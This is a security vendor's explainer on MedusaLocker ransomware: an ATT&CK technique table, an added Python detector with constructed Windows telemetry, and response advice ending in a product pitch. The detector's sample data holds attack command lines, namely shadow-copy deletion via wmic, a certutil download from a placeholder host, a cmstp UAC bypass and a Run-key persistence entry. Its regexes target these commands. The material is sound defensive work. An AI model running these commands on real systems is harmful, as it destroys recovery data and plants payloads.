
MedusaLocker Ransomware-As-A-Service (RAAS) Explained

What is MedusaLocker Ransomware?

MedusaLocker is a Ransomware-as-a-Service (RaaS) variant first discovered in 2019 that has since spread worldwide. To make its encryption more effective, MedusaLocker removes volume shadow copies and disables system services before encrypting data with AES-256.

MedusaLocker behaves like typical ransomware: it encrypts the victim’s data and demands a ransom for the decryption key. The malware itself does not appear to exfiltrate data, although the actors threaten victims with releasing sensitive data.

The Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the Department of the Treasury, and the Financial Crimes Enforcement Network (FinCEN) have released a joint advisory stating that “MedusaLocker actors predominantly rely on vulnerabilities in Remote Desktop Protocol (RDP) to access victims’ networks. The MedusaLocker actors encrypt the victim’s data and leave a ransom note with communication instructions in every folder containing an encrypted file. The note directs victims to transfer ransomware payments to a specific Bitcoin wallet address.”

MedusaLocker Ransomware – MITRE ATT&CK TTPs

MedusaLocker actors use the ATT&CK techniques listed in Table 1.

Initial Access

Technique Title | ID | Use
External Remote Services | T1133 | MedusaLocker actors gained access to victim devices through vulnerable RDP configurations.
Phishing | T1566 | MedusaLocker actors used phishing and spearphishing to obtain access to victims’ networks.
Valid Accounts | T1078 | Threat actors use brute-force password guessing for RDP services. The revealed password allows the attacker to gain initial access to the victim’s network.

Execution

Technique Title | ID | Use
Command and Scripting Interpreter: PowerShell | T1059.001 | MedusaLocker actors may abuse PowerShell commands and scripts for execution.
Windows Management Instrumentation | T1047 | MedusaLocker uses the Windows Management Instrumentation command-line utility (wmic) to delete volume shadow copies to prevent victims from recovering their encrypted data.

Persistence

Technique Title | ID | Use
Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder | T1547 | MedusaLocker establishes persistence and executes the ransomware at system startup by adding a registry Run key entry.

Privilege Escalation

Technique Title | ID | Use
Abuse Elevation Control Mechanism: Bypass UAC | T1548.002 | MedusaLocker ransomware uses the built-in Windows tool Microsoft Connection Manager Profile Installer (cmstp.exe) to bypass User Account Control (UAC) and run arbitrary commands with elevated privileges.
Valid Accounts | T1078 | Threat actors use brute-force password guessing for RDP services. If the guessed password belongs to the domain administrator, they can execute commands with elevated privileges.

Defense Evasion

Technique Title | ID | Use
Impair Defenses: Disable or Modify Tools | T1562.001 | MedusaLocker disables security products such as antivirus to avoid being detected.
Impair Defenses: Safe Mode Boot | T1562.009 | MedusaLocker actors may abuse Windows safe mode to disable endpoint defenses. Safe mode starts the Windows operating system with a limited set of drivers and services.

Credential Access

Technique Title | ID | Use
Brute Force | T1110 | Threat actors use brute-force password guessing for RDP services.

Discovery

Technique Title | ID | Use
File and Directory Discovery | T1083 | MedusaLocker searches for files and directories on the victim’s computer. After discovery, the ransomware starts to encrypt all files and directories.
Network Share Discovery | T1135 | MedusaLocker searches for shared files in the network. The shared files also indicate that there might be other hosts in the network to which the actors can move laterally.
Query Registry | T1012 | MedusaLocker searches the registry hive to learn about security products deployed in the victim’s network.

Lateral Movement

Technique Title | ID | Use
Remote Services | T1021 | MedusaLocker ransomware uses remote services to infect other hosts in the victim’s network. Threat actors use RDP, PsExec, and SMB to spread the ransomware payload.

Command and Control

Technique Title | ID | Use
Ingress Tool Transfer | T1105 | MedusaLocker uses certutil.exe to transfer files from its command and control server to the victim’s network.

Impact

Technique Title | ID | Use
Data Encrypted for Impact | T1486 | MedusaLocker actors encrypt data on target systems, or on large numbers of systems in a network, to interrupt the availability of system and network resources.
Inhibit System Recovery | T1490 | MedusaLocker actors may disable operating system features that help repair a corrupted system, such as the backup catalog, volume shadow copies, and automatic repair.

Table 1: MedusaLocker Actors ATT&CK Techniques for Enterprise
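As an added example that is not part of the original page or of the advisory it quotes, the following Python script applies the Table 1 techniques that leave host telemetry (shadow copy deletion via wmic or vssadmin, cmstp.exe UAC bypass, certutil downloads, safe mode boot configuration, PsExec, Run key persistence and RDP brute forcing) to constructed Windows event records. The record layout, host name, paths, SID, IP addresses and the brute-force threshold are all assumptions made for the example.

```python
"""Added example (not code from the NetSecurity page): flags the MedusaLocker
TTPs listed in Table 1 in constructed Windows telemetry. Records are plain
dicts modelled loosely on Sysmon event 1 (process creation), Sysmon event 13
(registry value set) and Security event 4625 (failed logon); every field name,
host name, path, SID and IP address below is an assumption made for the example."""
import re
from collections import Counter

# Command-line indicators for the Table 1 techniques that leave a process trail.
COMMAND_LINE_RULES = [
    ("T1047", "wmic used to delete volume shadow copies",
     re.compile(r"\bwmic\b.*\bshadowcopy\b.*\bdelete\b", re.I)),
    ("T1490", "vssadmin used to delete volume shadow copies",
     re.compile(r"\bvssadmin\b.*\bdelete\b.*\bshadows\b", re.I)),
    ("T1490", "wbadmin used to delete the backup catalog",
     re.compile(r"\bwbadmin\b.*\bdelete\b.*\bcatalog\b", re.I)),
    ("T1548.002", "cmstp.exe run with an .inf profile (UAC bypass pattern)",
     re.compile(r"\bcmstp(\.exe)?\b.*\s/s\b.*\.inf\b", re.I)),
    ("T1105", "certutil used to fetch a file from a URL",
     re.compile(r"\bcertutil(\.exe)?\b.*-urlcache\b.*https?://", re.I)),
    ("T1562.009", "bcdedit used to force a safe mode boot",
     re.compile(r"\bbcdedit(\.exe)?\b.*\bsafeboot\b", re.I)),
    ("T1021", "PsExec used for remote execution",
     re.compile(r"\bpsexec(64)?(\.exe)?\b", re.I)),
]
# Autostart persistence: any value written under a Run or RunOnce key (T1547).
RUN_KEY_PATTERN = re.compile(r"\\CurrentVersion\\Run(Once)?\\", re.I)
# Failed RDP logons (logon type 10) from one source at or above this count
# within the analysed window are reported as brute forcing (T1110). Illustrative value.
BRUTE_FORCE_THRESHOLD = 5


def detect(events, brute_force_threshold=BRUTE_FORCE_THRESHOLD):
    """Return one finding dict per matched indicator."""
    findings = []
    failed_rdp_logons = Counter()
    for ev in events:
        if ev["type"] == "process":
            for technique, description, pattern in COMMAND_LINE_RULES:
                if pattern.search(ev["cmdline"]):
                    findings.append({"technique": technique, "description": description,
                                     "host": ev["host"], "evidence": ev["cmdline"]})
        elif ev["type"] == "registry" and RUN_KEY_PATTERN.search(ev["target"]):
            findings.append({"technique": "T1547",
                             "description": "autostart value written under a Run key",
                             "host": ev["host"],
                             "evidence": f'{ev["target"]} = {ev["details"]}'})
        elif ev["type"] == "logon_failure" and ev["logon_type"] == 10:
            failed_rdp_logons[(ev["host"], ev["source_ip"])] += 1
    for (host, source_ip), count in failed_rdp_logons.items():
        if count >= brute_force_threshold:
            findings.append({"technique": "T1110",
                             "description": "repeated failed RDP logons from one source",
                             "host": host, "evidence": f"{count} failures from {source_ip}"})
    return findings


def techniques_seen(findings):
    """Sorted, de-duplicated ATT&CK IDs from a list of findings."""
    return sorted({f["technique"] for f in findings})


# Constructed telemetry: one host showing the Table 1 chain plus benign noise.
SAMPLE_EVENTS = [
    {"type": "logon_failure", "host": "WS01", "source_ip": "203.0.113.7", "logon_type": 10}
    for _ in range(6)
] + [
    {"type": "logon_failure", "host": "WS01", "source_ip": "198.51.100.2", "logon_type": 10},
    {"type": "process", "host": "WS01",
     "cmdline": "certutil.exe -urlcache -split -f http://example.invalid/p.bin C:\\Users\\Public\\p.bin"},
    {"type": "process", "host": "WS01",
     "cmdline": "cmstp.exe /s C:\\Users\\Public\\profile.inf"},
    {"type": "process", "host": "WS01", "cmdline": "wmic shadowcopy delete"},
    {"type": "process", "host": "WS01", "cmdline": "svchost.exe -k netsvcs"},  # benign noise
    {"type": "registry", "host": "WS01",
     "target": "HKU\\S-1-5-21-1111-2222-3333-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\svhost",
     "details": "C:\\Users\\Public\\svhost.exe"},
]

if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(f'{finding["host"]} {finding["technique"]}: {finding["description"]} ({finding["evidence"]})')
```

Running the script prints one line per finding: the five malicious records are reported under T1047, T1105, T1110, T1547 and T1548.002, while the benign svchost.exe process and the single failed logon from the second source are not. In production the same rules would run over exported Sysmon and Security logs, and the brute-force threshold should be tuned per environment and applied over a time window rather than over a whole export.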

How to Stop MedusaLocker Ransomware from Spreading?

You can stop MedusaLocker ransomware from spreading by isolating the infected devices from the rest of your network. Disconnecting a device from the network helps stop the ransomware from encrypting files on other devices. Once devices are isolated, scan them with antivirus software to remove the malware and any backdoors that may have been left behind.

How to Detect and Prevent MedusaLocker Ransomware Attack?

Cyber security threats and ransomware attacks are increasing at a tremendous pace. It is extremely difficult for cyber security analysts and incident responders to investigate and detect cyber security threats using conventional tools and techniques. NetSecurity’s ThreatResponder, with its diverse capabilities, can help your team detect the most advanced cyber threats, including APTs, zero-day attacks, and ransomware attacks. It can also help automate incident response actions across millions of endpoints, making it easy, fast, and hassle-free.

Want to see ThreatResponder, our cutting-edge Endpoint Detection & Response (EDR) platform, and ThreatResponder FORENSICS, the Swiss Army knife for forensic investigators, in action? Request a free demo of NetSecurity’s ThreatResponder platform.


Disclaimer

The page’s content shall be deemed proprietary and privileged information of NETSECURITY CORPORATION. It shall be noted that the contents of this page are copyrighted by NETSECURITY CORPORATION. Any violation/misuse/unauthorized use of this content “as is” or “modified” shall be considered illegal and subject to the articles and provisions stipulated in the General Data Protection Regulation (GDPR) and the Personal Data Protection Law (PDPL).